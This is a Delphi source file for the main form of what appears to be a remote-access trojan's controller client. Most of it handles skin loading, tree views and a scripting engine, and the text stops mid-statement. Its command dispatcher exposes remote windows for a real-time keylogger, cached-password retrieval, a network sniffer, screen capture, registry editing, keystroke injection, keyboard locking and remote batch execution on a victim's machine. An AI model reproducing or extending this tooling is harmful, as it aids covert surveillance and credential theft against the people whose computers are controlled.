unit Client1;

interface

uses
  Windows, Messages, SysUtils, Classes, Graphics, Controls, Forms, Dialogs,
  ExtCtrls, StdCtrls, Menus, ComCtrls, WSocket, Ftpcli, IniFiles, widget,
  ShellAPI, Registry, FileCtrl, ImgList, Winsock, RXShell, HttpProt,
  PicClip, ProCtrls, Client50;

type
  TForm1 = class(TForm)
    StatusBar1: TStatusBar;
    MainMenu1: TMainMenu;
    Connect1: TMenuItem;
    QuickConnect1: TMenuItem;
    ServerList1: TMenuItem;
    N1: TMenuItem;
    Disconnect1: TMenuItem;
    N2: TMenuItem;
    Exit1: TMenuItem;
    Tools1: TMenuItem;
    WSocket1: TWSocket;
    Panel1: TPanel;
    Widget1: TWidget;
    FileListBox1: TFileListBox;
    TreeView1: TTreeView;
    View1: TMenuItem;
    ExpandAll1: TMenuItem;
    CollapseAll1: TMenuItem;
    N4: TMenuItem;
    ScriptEditor1: TMenuItem;
    Console1: TMenuItem;
    Trees1: TMenuItem;
    Listener: TWSocket;
    MinimizetoTray1: TMenuItem;
    N3: TMenuItem;
    Scripts1: TMenuItem;
    N5: TMenuItem;
    Preferences1: TMenuItem;
    N6: TMenuItem;
    RefreshMenus1: TMenuItem;
    Label1: TLabel;
    Label2: TLabel;
    Timer1: TTimer;
    HttpCli1: THttpCli;
    ImageList1: TImageList;
    N7: TMenuItem;
    Skins1: TMenuItem;
    Reconnect1: TMenuItem;
    About1: TMenuItem;
    PicClip1: TPicClip;
    Image1: TProImage;
    RxTrayIcon1: TRxTrayIcon;
    procedure AppMessage(var Msg: TMsg; var Handled: Boolean);
    procedure Exit1Click(Sender: TObject);
    procedure QuickConnect1Click(Sender: TObject);
    procedure ConnectTo(RemoteHost, Password: String);
    procedure SetStatus(status: string);
    procedure WSocket1SessionConnected(Sender: TObject; Error: Word);
    procedure WSocket1DataAvailable(Sender: TObject; Error: Word);
    procedure FormCreate(Sender: TObject);
    procedure FormDestroy(Sender: TObject);
    procedure SaveSettings;
    procedure Send(Data: Array of String);
    procedure FormClose(Sender: TObject; var Action: TCloseAction);
    procedure ProcessQueue;
    procedure Receive(Segments: Array of String);
    procedure Widget1Click(Sender: TObject);
    procedure RxTrayIcon1DblClick(Sender: TObject);
    procedure LaunchTool(Sender: TObject);
    procedure LaunchTree(Sender: TObject);
    procedure LaunchScript(Sender: TObject);
    procedure FormShow(Sender: TObject);
    procedure ServerList1Click(Sender: TObject);
    procedure WSocket1SessionClosed(Sender: TObject; Error: Word);
    procedure Disconnect1Click(Sender: TObject);
    procedure Tools1Click(Sender: TObject);
    procedure TreeView1DblClick(Sender: TObject);
    procedure TreeView1Expanding(Sender: TObject; Node: TTreeNode;
      var AllowExpansion: Boolean);
    procedure TreeView1Collapsing(Sender: TObject; Node: TTreeNode;
      var AllowCollapse: Boolean);
    procedure ExpandAll1Click(Sender: TObject);
    procedure CollapseAll1Click(Sender: TObject);
    procedure About1Click(Sender: TObject);
    function ScriptCommand(ACommand: string; var Reply: String): string;
    function GetAlias(AName: string): string;
    function ExecuteScript(ScriptFile, StartAt: string): string;
    function AliasExists(AName: string): boolean;
    function AddAlias(AName, ACommand: string): string;
    function RemoveAlias(AName: string): string;
    function AddTree(TreeFile: string): string;
    procedure ScriptEditor1Click(Sender: TObject);
    procedure Console1Click(Sender: TObject);
    procedure ListenerDataAvailable(Sender: TObject; Error: Word);
    procedure ProcessListeningQueue;
    procedure Trees1Click(Sender: TObject);
    procedure Scripts1Click(Sender: TObject);
    procedure Preferences1Click(Sender: TObject);
    procedure UpdateDynamicMenus;
    procedure RefreshMenus1Click(Sender: TObject);
    procedure FormResize(Sender: TObject);
    procedure UpdateAnnouncements;
    procedure DisplayAnnouncement(s: string);
    procedure HttpCli1SessionConnected(Sender: TObject);
    procedure Timer1Timer(Sender: TObject);
    procedure LoadSkin(SkinFile: string);
    procedure SetupTreeIcons;
    procedure TreeView1Expanded(Sender: TObject; Node: TTreeNode);
    procedure TreeView1Collapsed(Sender: TObject; Node: TTreeNode);
    function ExtToIndex(S: string): integer;
    procedure FormActivate(Sender: TObject);
    procedure LaunchSkin(Sender: TObject);
    procedure Skins1Click(Sender: TObject);
    procedure CreateFloatingButton(X, Y: integer; Text, Command: string);
    procedure Reconnect1Click(Sender: TObject);
    procedure WSocket1SendData(Sender: TObject; BytesSent: Integer);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

  SkinsDir, CurrentTree, TreeDir, ScriptDir, DefaultID,
  WinSysPath, CustomFileExt, RemoteVer, NickName, CurrentMessage,
  ServerPwd, ToolsDir, SaveDir, RemoteIP, RemotePassword,
  ReconnectIP, ButtonUpImage, ButtonDownImage, CurrentSkin: string;

  ListeningBuf, ListeningIP,
  AliasNames, AliasCommands, Sweeplist: TStringList;

  MessageQueue: array of string;

  AutocloseScript, AutorunScript, AbortAlias,
  StopCapDownload, Connecting, ShowICQErrors,
  processingQueue: boolean;

  AnnounceNum, HistCount, PassCount, ScriptDelay,
  AniFrameDelay, ResX, ResY, BGAlign: integer;

  siServerIcon, siTreeFolderClosed, siTreeFolderOpen,
  siTreeWindow, siTreeFunction, siFileParent, siFileFolder,
  siFileUnknown, siAppVisible, siAppInvisible, siAppActive,
  siRegistryParent, siRegistryFolder,
  siRegistryString, siRegistryDefString, siRegistryBinary,
  siRegistryDefBinary, siDriveRemovable, siDriveFixed,
  siDriveNetwork, siDriveRAM, siDriveCD, siShareDrive,
  siSharePrinter, siChatActive, siChatInactive, siScriptLineMark,
  siScriptEndLineMark, siScriptButtonNext, siScriptButtonRun,
  siScriptButtonPause, siScriptButtonStop, siProcess, siModule: SmallInt;

  Announcements, FileMasks: array of string;
  AnnounceTime, FileIcons: array of integer;
  FloatingButtons: array of TForm50;

implementation

uses Client3, Shared1, Client2, Client5, Client8,
  Client10, Client11, Client12, Client13, Client14, Client4, Client7,
  Client9, Client17, Client18, Client19, Client20, Client21, Client22,
  Client23, Client24, Client25, Client26, Client28, Client29, Client30,
  Client31, Client32, Client33, Client34, Client35, Client36, Client37,
  Client38, Client39, Client40, Client41, Client42, Client43, Client44,
  Client45, Client46, Client47, Client48, Client6, Client15, Client27,
  Client49, Client51, Client52;

{$R *.DFM}

procedure TForm1.CreateFloatingButton(X, Y: integer; Text, Command: string);
var ButtonForm: TForm50;
begin

SetLength(FloatingButtons, Length(FloatingButtons) + 1);
FloatingButtons[Length(FloatingButtons) - 1] := TForm50.Create(Application);
ButtonForm := FloatingButtons[Length(FloatingButtons) - 1];

ButtonForm.Left := X;
ButtonForm.Top := Y;
ButtonForm.Caption := Text;
ButtonForm.Command := Command;
ButtonForm.Label1.Caption := Text;
ButtonForm.PaintBox2.Hint := Command;

if ButtonUpImage <> '' then
ButtonForm.Image1.Picture.LoadFromFile(SkinsDir + ButtonUpImage);
if ButtonDownImage <> '' then
ButtonForm.Image2.Picture.LoadFromFile(SkinsDir + ButtonDownImage);

ButtonForm.Show;
end;

function TForm1.ExtToIndex(S: string): integer;
var i: integer;
begin

for i := 0 to Length(FileMasks) - 1 do
if Uppercase(S) = Uppercase('.' + FileMasks[i]) then
begin
Result := FileIcons[i];
Exit;
end;

Result := siFileUnknown;

end;

procedure TForm1.LoadSkin(SkinFile: string);
var i: integer;
    ini: TIniFile;
    S: string;
    SL: TStringList;
begin

Form48.Gauge1.Progress := 0;
Form48.Gauge1.MaxValue := 6;
Form48.Show;
Form48.Update;

ini := TIniFile.Create(SkinFile);

S := Ini.ReadString('Colors', 'WindowBackground', '255 000 000');
if Uppercase(S) = 'DEFAULT' then Form48.Gauge1.BackColor := clWindow
else Form48.Gauge1.BackColor := RGB(StrToInt(Copy(S, 1, 3)), StrToInt(Copy(S, 5, 3)), StrToInt(Copy(S, 9, 3)));

S := Ini.ReadString('Colors', 'WindowText', '255 000 000');
if Uppercase(S) = 'DEFAULT' then Form48.Gauge1.ForeColor := clWindowText
else Form48.Gauge1.ForeColor := RGB(StrToInt(Copy(S, 1, 3)), StrToInt(Copy(S, 5, 3)), StrToInt(Copy(S, 9, 3)));

///////////////////////////////////////////////////

ButtonUpImage := Ini.ReadString('Files', 'FloatButtonUp', '');
ButtonDownImage := Ini.ReadString('Files', 'FloatButtonDown', '');

Form48.Label2.Caption := ini.ReadString('Skin', 'Name', '');

S := Ini.ReadString('Files', 'Background', '');

if S <> '' then
Image1.Picture.LoadFromFile(SkinsDir + S) else
Image1.Picture.Assign(nil);

BGAlign := Ini.ReadInteger('Skin', 'BackgroundAlign', 5);

Image1.Align := alNone;
Image1.AutoSize := True;
Image1.AutoSize := False;
Image1.Center := false;
Image1.Tiled := false;

case BGAlign of
1: begin
Image1.Top := 0;
Image1.Left := 0;
end;
2, 3: Image1.Top := 0;
4, 7: Image1.Left := 0;
5: begin
Image1.Align := alClient;
Image1.Center := true;
end;
0: begin
Image1.Tiled := True;
Image1.Align := alClient;
end;
end;

FormResize(nil);

Form48.Gauge1.Progress := Form48.gauge1.Progress + 1;
Application.ProcessMessages;

///////////////////////////////////////////////////

PicClip1.Picture.LoadFromFile(SkinsDir + Ini.ReadString('Files', 'Icons', ''));
PicClip1.Width := 16;
PicClip1.Height := 16;

ImageList1.Clear;

for i := 0 to PicClip1.Count - 1 do
ImageList1.AddMasked(PicClip1.GraphicCell[i], PicClip1.GraphicCell[i].Canvas.Pixels[0, 0]);

Form48.Gauge1.Progress := Form48.gauge1.Progress + 1;
Application.ProcessMessages;

///////////////////////////////////////////////////

siServerIcon := ini.ReadInteger('ImageMap', 'ServerIcon', 0) - 1;
siTreeFolderClosed := ini.ReadInteger('ImageMap', 'TreeFolderClosed', 0) - 1;
siTreeFolderOpen := ini.ReadInteger('ImageMap', 'TreeFolderOpen', 0) - 1;
siTreeWindow := ini.ReadInteger('ImageMap', 'TreeWindow', 0) - 1;
siTreeFunction := ini.ReadInteger('ImageMap', 'TreeFunction', 0) - 1;
siFileParent := ini.ReadInteger('ImageMap', 'FileParent', 0) - 1;
siFileFolder := ini.ReadInteger('ImageMap', 'FileFolder', 0) - 1;
siFileUnknown := ini.ReadInteger('ImageMap', 'FileUnknown', 0) - 1;
siAppVisible := ini.ReadInteger('ImageMap', 'AppVisible', 0) - 1;
siAppInvisible := ini.ReadInteger('ImageMap', 'AppInvisible', 0) - 1;
siAppActive := ini.ReadInteger('ImageMap', 'AppActive', 0) - 1;
siRegistryParent := ini.ReadInteger('ImageMap', 'RegistryParent', 0) - 1;
siRegistryFolder := ini.ReadInteger('ImageMap', 'RegistryFolder', 0) - 1;
siRegistryString := ini.ReadInteger('ImageMap', 'RegistryString', 0) - 1;
siRegistryDefString := ini.ReadInteger('ImageMap', 'RegistryDefString', 0) - 1;
siRegistryBinary := ini.ReadInteger('ImageMap', 'RegistryBinary', 0) - 1;
siRegistryDefBinary := ini.ReadInteger('ImageMap', 'RegistryDefBinary', 0) - 1;
siDriveRemovable := ini.ReadInteger('ImageMap', 'DriveRemovable', 0) - 1;
siDriveFixed := ini.ReadInteger('ImageMap', 'DriveFixed', 0) - 1;
siDriveNetwork := ini.ReadInteger('ImageMap', 'DriveNetwork', 0) - 1;
siDriveRAM := ini.ReadInteger('ImageMap', 'DriveRAM', 0) - 1;
siDriveCD := ini.ReadInteger('ImageMap', 'DriveCD', 0) - 1;
siShareDrive := ini.ReadInteger('ImageMap', 'ShareDrive', 0) - 1;
siSharePrinter := ini.ReadInteger('ImageMap', 'SharePrinter', 0) - 1;
siChatActive := ini.ReadInteger('ImageMap', 'ChatActive', 0) - 1;
siChatInactive := ini.ReadInteger('ImageMap', 'ChatInactive', 0) - 1;
siScriptLineMark := ini.ReadInteger('ImageMap', 'ScriptLineMark', 0) - 1;
siScriptEndLineMark := ini.ReadInteger('ImageMap', 'ScriptEndLineMark', 0) - 1;
siScriptButtonNext := ini.ReadInteger('ImageMap', 'ScriptButtonNext', 0) - 1;
siScriptButtonRun := ini.ReadInteger('ImageMap', 'ScriptButtonRun', 0) - 1;
siScriptButtonPause := ini.ReadInteger('ImageMap', 'ScriptButtonPause', 0) - 1;
siScriptButtonStop := ini.ReadInteger('ImageMap', 'ScriptButtonStop', 0) - 1;
siProcess := ini.ReadInteger('ImageMap', 'Process', 0) - 1;
siModule := ini.ReadInteger('ImageMap', 'Module', 0) - 1;

Form48.Gauge1.Progress := Form48.gauge1.Progress + 1;
Application.ProcessMessages;

///////////////////////////////////////////////////

SetupTreeIcons;

Form48.Gauge1.Progress := Form48.gauge1.Progress + 1;
Application.ProcessMessages;

///////////////////////////////////////////////////

SL := TStringList.Create;

ini.ReadSection('FileMap', SL);

SetLength(FileMasks, SL.Count);
SetLength(FileIcons, SL.Count);

for i := 0 to SL.Count - 1 do
begin
FileMasks[i] := SL[i];
FileIcons[i] := Ini.ReadInteger('FileMap', SL[i], siFileUnknown) - 1;
end;

SL.Free;

Form48.Gauge1.Progress := Form48.gauge1.Progress + 1;
Application.ProcessMessages;

///////////////////////////////////////////////////

S := Ini.ReadString('Colors', 'ClientBackground', 'DEFAULT');
if Uppercase(S) = 'DEFAULT' then Panel1.Color := clAppWorkspace
else Panel1.Color := RGB(StrToInt(Copy(S, 1, 3)), StrToInt(Copy(S, 5, 3)), StrToInt(Copy(S, 9, 3)));

S := Ini.ReadString('Colors', 'AnnounceText', 'DEFAULT');
if Uppercase(S) = 'DEFAULT' then Label1.Font.Color := clWindow
else Label1.Font.Color := RGB(StrToInt(Copy(S, 1, 3)), StrToInt(Copy(S, 5, 3)), StrToInt(Copy(S, 9, 3)));

S := Ini.ReadString('Colors', 'AnnounceShadow', 'DEFAULT');
if Uppercase(S) = 'DEFAULT' then Label2.Font.Color := clWindowText
else Label2.Font.Color := RGB(StrToInt(Copy(S, 1, 3)), StrToInt(Copy(S, 5, 3)), StrToInt(Copy(S, 9, 3)));

S := Ini.ReadString('Colors', 'WindowBackground', 'DEFAULT');
if Uppercase(S) = 'DEFAULT' then TreeView1.Color := clWindow
else TreeView1.Color := RGB(StrToInt(Copy(S, 1, 3)), StrToInt(Copy(S, 5, 3)), StrToInt(Copy(S, 9, 3)));

S := Ini.ReadString('Colors', 'WindowText', 'DEFAULT');
if Uppercase(S) = 'DEFAULT' then TreeView1.Font.Color := clWindowText
else TreeView1.Font.Color := RGB(StrToInt(Copy(S, 1, 3)), StrToInt(Copy(S, 5, 3)), StrToInt(Copy(S, 9, 3)));

///////////////////////////////////////////////////////////

Form2.ListView1.Color := TreeView1.Color;
Form2.ListView1.Font.Color := TreeView1.Font.Color;
Form2.Gauge1.BackColor := TreeView1.Color;
Form2.Gauge1.ForeColor := TreeView1.Font.Color;

Form3.Edit1.Color := TreeView1.Color;
Form3.Edit1.Font.Color := TreeView1.Font.Color;

Form5.Memo1.Color := TreeView1.Color;
Form5.Memo1.Font.Color := TreeView1.Font.Color;

Form6.Memo1.Color := TreeView1.Color;
Form6.Memo1.Font.Color := TreeView1.Font.Color;

Form7.Edit1.Color := TreeView1.Color;
Form7.Edit1.Font.Color := TreeView1.Font.Color;

Form8.ListView1.Color := TreeView1.Color;
Form8.ListView1.Font.Color := TreeView1.Font.Color;

Form10.ListView1.Color := TreeView1.Color;
Form10.ListView1.Font.Color := TreeView1.Font.Color;

Form11.ListView1.Color := TreeView1.Color;
Form11.ListView1.Font.Color := TreeView1.Font.Color;

Form12.ListView1.Color := TreeView1.Color;
Form12.ListView1.Font.Color := TreeView1.Font.Color;

Form13.ListView6.Color := TreeView1.Color;
Form13.ListView6.Font.Color := TreeView1.Font.Color;

Form14.Edit1.Color := TreeView1.Color;
Form14.Edit1.Font.Color := TreeView1.Font.Color;
Form14.Edit2.Color := TreeView1.Color;
Form14.Edit2.Font.Color := TreeView1.Font.Color;
Form14.Edit3.Color := TreeView1.Color;
Form14.Edit3.Font.Color := TreeView1.Font.Color;

Form17.ListView4.Color := TreeView1.Color;
Form17.ListView4.Font.Color := TreeView1.Font.Color;

Form18.ListView3.Color := TreeView1.Color;
Form18.ListView3.Font.Color := TreeView1.Font.Color;

Form19.Edit5.Color := TreeView1.Color;
Form19.Edit5.Font.Color := TreeView1.Font.Color;
Form19.Edit6.Color := TreeView1.Color;
Form19.Edit6.Font.Color := TreeView1.Font.Color;

Form20.ListView5.Color := TreeView1.Color;
Form20.ListView5.Font.Color := TreeView1.Font.Color;

Form21.Memo1.Color := TreeView1.Color;
Form21.Memo1.Font.Color := TreeView1.Font.Color;

Form22.ListView1.Color := TreeView1.Color;
Form22.ListView1.Font.Color := TreeView1.Font.Color;

Form23.Edit1.Color := TreeView1.Color;
Form23.Edit1.Font.Color := TreeView1.Font.Color;
Form23.Edit2.Color := TreeView1.Color;
Form23.Edit2.Font.Color := TreeView1.Font.Color;

Form24.Edit1.Color := TreeView1.Color;
Form24.Edit1.Font.Color := TreeView1.Font.Color;
Form24.Memo1.Color := TreeView1.Color;
Form24.Memo1.Font.Color := TreeView1.Font.Color;
Form24.ListView1.Color := TreeView1.Color;
Form24.ListView1.Font.Color := TreeView1.Font.Color;

Form25.Edit1.Color := TreeView1.Color;
Form25.Edit1.Font.Color := TreeView1.Font.Color;
Form25.Edit2.Color := TreeView1.Color;
Form25.Edit2.Font.Color := TreeView1.Font.Color;
Form25.ListView1.Color := TreeView1.Color;
Form25.ListView1.Font.Color := TreeView1.Font.Color;

Form26.Edit1.Color := TreeView1.Color;
Form26.Edit1.Font.Color := TreeView1.Font.Color;
Form26.Edit2.Color := TreeView1.Color;
Form26.Edit2.Font.Color := TreeView1.Font.Color;
Form26.Edit3.Color := TreeView1.Color;
Form26.Edit3.Font.Color := TreeView1.Font.Color;
Form26.Edit4.Color := TreeView1.Color;
Form26.Edit4.Font.Color := TreeView1.Font.Color;

Form27.Edit1.Color := TreeView1.Color;
Form27.Edit1.Font.Color := TreeView1.Font.Color;

Form29.ListView1.Color := TreeView1.Color;
Form29.ListView1.Font.Color := TreeView1.Font.Color;

Form30.ListView1.Color := TreeView1.Color;
Form30.ListView1.Font.Color := TreeView1.Font.Color;

Form31.ListView1.Color := TreeView1.Color;
Form31.ListView1.Font.Color := TreeView1.Font.Color;

Form32.ListView1.Color := TreeView1.Color;
Form32.ListView1.Font.Color := TreeView1.Font.Color;

Form33.Edit1.Color := TreeView1.Color;
Form33.Edit1.Font.Color := TreeView1.Font.Color;

Form34.Edit1.Color := TreeView1.Color;
Form34.Edit1.Font.Color := TreeView1.Font.Color;

Form35.Memo1.Color := TreeView1.Color;
Form35.Memo1.Font.Color := TreeView1.Font.Color;
Form35.Edit1.Color := TreeView1.Color;
Form35.Edit1.Font.Color := TreeView1.Font.Color;

Form37.Edit1.Color := TreeView1.Color;
Form37.Edit1.Font.Color := TreeView1.Font.Color;
Form37.Edit2.Color := TreeView1.Color;
Form37.Edit2.Font.Color := TreeView1.Font.Color;
Form37.Edit3.Color := TreeView1.Color;
Form37.Edit3.Font.Color := TreeView1.Font.Color;
Form37.Edit4.Color := TreeView1.Color;
Form37.Edit4.Font.Color := TreeView1.Font.Color;

Form39.Edit1.Color := TreeView1.Color;
Form39.Edit1.Font.Color := TreeView1.Font.Color;

Form40.Edit1.Color := TreeView1.Color;
Form40.Edit1.Font.Color := TreeView1.Font.Color;

Form41.Memo1.Color := TreeView1.Color;
Form41.Memo1.Font.Color := TreeView1.Font.Color;

Form42.ListView1.Color := TreeView1.Color;
Form42.ListView1.Font.Color := TreeView1.Font.Color;

Form43.Edit1.Color := TreeView1.Color;
Form43.Edit1.Font.Color := TreeView1.Font.Color;

Form44.ListView1.Color := TreeView1.Color;
Form44.ListView1.Font.Color := TreeView1.Font.Color;

Form45.ListView1.Color := TreeView1.Color;
Form45.ListView1.Font.Color := TreeView1.Font.Color;

Form47.ListView1.Color := TreeView1.Color;
Form47.ListView1.Font.Color := TreeView1.Font.Color;

Form49.Edit1.Color := TreeView1.Color;
Form49.Edit1.Font.Color := TreeView1.Font.Color;
Form49.Edit2.Color := TreeView1.Color;
Form49.Edit2.Font.Color := TreeView1.Font.Color;

Form51.ListView1.Color := TreeView1.Color;
Form51.ListView1.Font.Color := TreeView1.Font.Color;

Form52.ListView1.Color := TreeView1.Color;
Form52.ListView1.Font.Color := TreeView1.Font.Color;

///////////////////////////////////////////////////////////

for i := 0 to Length(FloatingButtons) - 1 do
begin
if ButtonUpImage <> '' then
FloatingButtons[i].Image1.Picture.LoadFromFile(SkinsDir + ButtonUpImage);
if ButtonDownImage <> '' then
FloatingButtons[i].Image2.Picture.LoadFromFile(SkinsDir + ButtonDownImage);
end;

TreeView1.Repaint;

Form48.Gauge1.Progress := Form48.gauge1.Progress + 1;
Application.ProcessMessages;

///////////////////////////////////////////////////

Ini.Free;
Form48.Close;

end;

function TForm1.AddTree(TreeFile: string): string;
var A, B: TStringList;
begin

try
Result := '';
A := TStringlist.Create;
B := TStringlist.Create;

TreeView1.SaveToFile(SaveDir + 'treeadd.tmp');
A.LoadFromFile(SaveDir + 'treeadd.tmp');
B.LoadFromFile(TreeDir + TreeFile);
A.AddStrings(B);
A.SaveToFile(SaveDir + 'treeadd.tmp');
TreeView1.LoadFromFile(SaveDir + 'treeadd.tmp');
A.Free;
B.Free;

DeleteFile(SaveDir + 'treeadd.tmp');

SetupTreeIcons;
TreeView1.AlphaSort;

except
Result := 'Couldn''t add tree: "' + Treefile + '".';
end;

end;

procedure TForm1.SetupTreeIcons;
var i: integer;
begin

for i := 0 to TreeView1.Items.Count - 1 do
begin
if TreeView1.Items[i].Count > 0 then
begin
TreeView1.Items[i].ImageIndex := siTreeFolderClosed;
TreeView1.Items[i].SelectedIndex := siTreeFolderClosed;
end else
begin
if TreeView1.Items[i].Text[Length(TreeView1.Items[i].Text)] = '.' then
begin
TreeView1.Items[i].ImageIndex := siTreeWindow;
TreeView1.Items[i].SelectedIndex := siTreeWindow;
end else
begin
TreeView1.Items[i].ImageIndex := siTreeFunction;
TreeView1.Items[i].SelectedIndex := siTreeFunction;
end;
end;
end;

TreeView1.Repaint;

end;

function TForm1.ExecuteScript(ScriptFile, StartAt: string): string;
var a, i: integer;
    s, Segments: TStringList;
    ScriptWindow: TForm36;
    DoExec, Cont, InQuotes: boolean;
    Seg, SS: string;
begin
S := TStringList.Create;
Result := '';

try
S.LoadFromFile(ScriptDir + ScriptFile);
except
Result := 'Couldn''t exec: "' + scriptfile + '".';
S.Free;
Exit;
end;

Segments := TStringList.Create;
ScriptWindow := TForm36.Create(Application);
ScriptWindow.Caption := 'Script - ' + ScriptFile;

ScriptWindow.ListView1.Color := TreeView1.Color;
ScriptWindow.ListView1.Font.Color := TreeView1.Font.Color;
ScriptWindow.Memo1.Color := TreeView1.Color;
ScriptWindow.Memo1.Font.Color := TreeView1.Font.Color;

ScriptWindow.ToolButton2.ImageIndex := siScriptButtonRun;
ScriptWindow.ToolButton3.ImageIndex := siScriptButtonPause;
ScriptWindow.ToolButton4.ImageIndex := siScriptButtonStop;
ScriptWindow.ToolButton5.ImageIndex := siScriptButtonNext;

ScriptWindow.Show;

for a := 0 to S.count - 1 do
begin
for i := 1 to Length(s[a]) - 1 do
if (s[a][i] = '/') and (s[a][i + 1] = '/') then
begin
s[a] := copy(s[a], 1, I - 1);
Break;
end;

S[a] := Trim(s[a]);
end;

if StartAt <> '' then
begin
for i := 0 to s.count - 1 do
if ':' + UpperCase(StartAt) = Copy(Uppercase(S[i]), 1, Length(StartAt) + 1) then
begin
ScriptWindow.CurrentLine := I;
Break;
end;
end else
ScriptWindow.CurrentLine := 0;

ScriptWindow.PrevLine := -1;

if S.count = 0 then
begin
ScriptWindow.Close;
Exit;
end;

for i := 0 to S.count - 1 do
with ScriptWindow.ListView1.Items.Add do
begin
ImageIndex := -1;
Caption := s[i];
end;

ScriptWindow.AbortScript := false;
ScriptWindow.SingleStep := false;

if not AutoRunScript then
ScriptWindow.ToolButton3.Click;

ScriptWindow.HighlightLine(siScriptLineMark);

while true do
begin
Application.ProcessMessages;

if ScriptWindow.AbortScript then
Break;

if (s[ScriptWindow.CurrentLine] = '') or (s[ScriptWindow.CurrentLine][1] = ':') then
begin

if ScriptWindow.CurrentLine >= ScriptWindow.ListView1.Items.COunt - 1 then
Break;

inc(ScriptWindow.CurrentLine);
ScriptWindow.HighlightLine(siScriptLineMark);
Continue;

end;

if ScriptWindow.SingleStep then
ScriptWindow.SingleStep := false
else
if ScriptWindow.ToolButton2.Enabled then
Continue;

Segments.Clear;
InQuotes := false;
s[ScriptWindow.CurrentLine] := s[ScriptWindow.CurrentLine] + ' ';
Seg := '';

for i := 1 to Length(s[ScriptWindow.CurrentLine]) do
begin

if s[ScriptWindow.CurrentLine][i] = '"' then
InQuotes := not InQuotes else

if s[ScriptWindow.CurrentLine][i] = '$' then
Seg := Seg + '"' else

if (s[ScriptWindow.CurrentLine][i] = ' ') and (not InQuotes) then
begin

if not((seg = '') and (Segments[Segments.Count - 1] <> '')) then
begin
Segments.Add(Seg);
Seg := '';
end;

end else
Seg := Seg + s[ScriptWindow.CurrentLine][i];
end;

DoExec := true;
Cont := false;
for i := 0 to s.count - 1 do
if ':' + UpperCase(segments[0]) = Copy(Uppercase(S[i]), 1, Length(segments[0]) + 1) then
begin

if segments.Count > 1 then
begin

if StrToInt(segments[1]) = 0 then
begin
DoExec := false;
Break;
end;

Seg := segments[0] + ' ' + IntToStr(StrToInt(segments[1]) - 1);
s[ScriptWindow.CurrentLine] := seg;
ScriptWindow.ListView1.Items[ScriptWindow.Currentline].Caption := seg;
end;

Application.ProcessMessages;
ScriptWindow.CurrentLine := I;
Cont := true;
Break;
end;
if Cont then Continue;

if DoExec then
begin
SS := ScriptCommand(S[ScriptWindow.CurrentLine], Seg);

if Seg <> '' then
ScriptWindow.Memo1.Lines.Add(Seg);

if SS <> '' then
begin
MessageDlg(SS, mtError, [mbOk], 0);
ScriptWindow.ToolButton3.Click;
end;

end;

TimeSleep(ScriptDelay);

if ScriptWindow.CurrentLine < S.count - 1 then
begin
Inc(ScriptWindow.CurrentLine);
ScriptWindow.HighlightLine(siScriptLineMark);
end else
Break;

end;

ScriptWindow.ToolButton2.Enabled := false;
ScriptWindow.ToolButton3.Enabled := false;
ScriptWindow.ToolButton4.Enabled := false;
ScriptWindow.ToolButton5.Enabled := false;
ScriptWindow.HighlightLine(siScriptEndLineMark);
ScriptWindow.StatusBar1.Panels[0].Text := 'Done';

if AutoCloseScript then
ScriptWindow.Close;

Segments.Free;
S.Free;
end;

function TForm1.ScriptCommand(ACommand: string; var Reply: String): string;
var i: integer;
    segments: TStringList;
    Seg: string;
    UIN, Silent, InQuotes: boolean;
    SendData: array of string;
begin

Reply := '';
Result := '';

for i := 1 to Length(ACommand) - 1 do
if (Acommand[i] = '/') and (Acommand[i + 1] = '/') then
begin
ACommand := copy(ACommand, 1, I - 1);
Break;
end;

ACommand := Trim(Acommand);

if ACommand = '' then Exit;

if ACommand[1] = '@' then begin
Silent := true;
ACommand := Copy(Acommand, 2, Length(ACommand));
end else Silent := false;

Segments := TStringList.Create;
InQuotes := false;
ACommand := ACommand + ' ';
Seg := '';

for i := 1 to Length(ACommand) do
begin

if ACommand[i] = '"' then
InQuotes := not InQuotes else

if ACommand[i] = '$' then
Seg := Seg + '"' else

if (ACommand[i] = ' ') and (not InQuotes) then
begin

if not((seg = '') and (Segments[Segments.Count - 1] <> '')) then
begin
Segments.Add(Seg);
Seg := '';
end;

end else

Seg := Seg + ACommand[i];

end;

if not Silent then
Reply := Reply + '-> ' + ACommand + #13#10;

///////////////////////////////////////////////////////

Application.ProcessMessages;

if uppercase(segments[0]) = 'ALIASLIST' then
begin

for i := 0 to AliasNames.Count - 1 do
Reply := Reply + (StringLength(AliasNames[i], 30) + ' = ' + AliasCommands[i]) + #13#10;

end else

if Uppercase(segments[0]) = 'MERROR' then
MessageDlg(segments[1], mtError, [mbOk], 0) else

if Uppercase(segments[0]) = 'MWARNING' then
MessageDlg(segments[1], mtWarning, [mbOk], 0) else

if Uppercase(segments[0]) = 'MINFO' then
MessageDlg(segments[1], mtInformation, [mbOk], 0) else

if uppercase(segments[0]) = 'SLEEP' then
TimeSleep(StrToInt(segments[1])) else

if uppercase(segments[0]) = 'ECHO' then
Reply := Reply + segments[1] + #13#10 else

if uppercase(segments[0]) = 'WINDOW' then
begin

if uppercase(segments[1]) = 'RTKEYLOG' then Form5.Show else
if uppercase(segments[1]) = 'REGISTRY' then Form32.Show else
if uppercase(segments[1]) = 'CPUINFO' then Form30.Show else
if uppercase(segments[1]) = 'FINDFILES' then Form25.Show else
if uppercase(segments[1]) = 'CLIENTCHAT' then Form24.Show else
if uppercase(segments[1]) = 'LAUNCHAPP' then Form23.Show else
if uppercase(segments[1]) = 'CACHEDPWDS' then Form31.Show else
if uppercase(segments[1]) = 'GENINFO' then Form8.Show else
if uppercase(segments[1]) = 'ICQINFO' then Form42.Show else
if uppercase(segments[1]) = 'FILEEXP' then Form12.Show else
if uppercase(segments[1]) = 'SCREENCAP' then Form9.Show else
if uppercase(segments[1]) = 'APPLIST' then Form10.Show else
if uppercase(segments[1]) = 'NETCONN' then Form18.Show else
if uppercase(segments[1]) = 'TELNETEMU' then Form19.Show else
if uppercase(segments[1]) = 'UDPLISTEN' then Form13.Show else
if uppercase(segments[1]) = 'UDPSEND' then Form14.Show else
if uppercase(segments[1]) = 'CURSOR' then Form39.Show else
if uppercase(segments[1]) = 'NETINFO' then Form20.Show else
if uppercase(segments[1]) = 'SENDKEYS' then Form40.Show else
if uppercase(segments[1]) = 'BATCHFILE' then Form41.Show else
if uppercase(segments[1]) = 'SNIFFER' then Form17.Show else
if uppercase(segments[1]) = 'ADDCONTACT' then Form43.Show else
if uppercase(segments[1]) = 'NETSHARES' then Form44.Show else
if uppercase(segments[1]) = 'KEYLOCK' then Form46.Show else
if uppercase(segments[1]) = 'HISTORY' then Form47.Show else
